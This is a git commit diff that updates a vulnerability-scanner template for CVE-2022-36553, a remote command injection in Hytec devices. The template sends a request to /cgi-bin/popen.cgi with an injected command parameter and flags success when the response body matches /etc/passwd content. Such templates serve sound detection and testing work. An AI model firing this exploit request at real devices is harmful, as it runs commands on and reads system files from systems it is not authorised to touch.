updated matcher

2023-10-26 12:34:01 +05:30 · 2023-10-26 12:34:01 +05:30 · 6b25c6998c
parent 03c42224a1
commit 6b25c6998c
1 changed files with 10 additions and 5 deletions
--- a/http/cves/2022/CVE-2022-36553.yaml
+++ b/http/cves/2022/CVE-2022-36553.yaml
@ -24,9 +24,14 @@ info:
  tags: cve,cve2022,hytec,rce

 http:
-  - method: GET
-    path:
-      - '{{BaseURL}}/cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912'
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1
+        Host: {{Hostname}}

    payloads:
      command:
@ -39,7 +44,7 @@ http:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
-          - "contains(header, 'lighttpd/1.4.30')"
+          - "contains(body_1, '<title>index</title>')"
          - "status_code == 200"
        condition: and

@ -49,5 +54,5 @@ http:
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
-          - "contains(header, 'lighttpd/1.4.30')"
+          - "contains(body_1, '<title>index</title>')"
        condition: and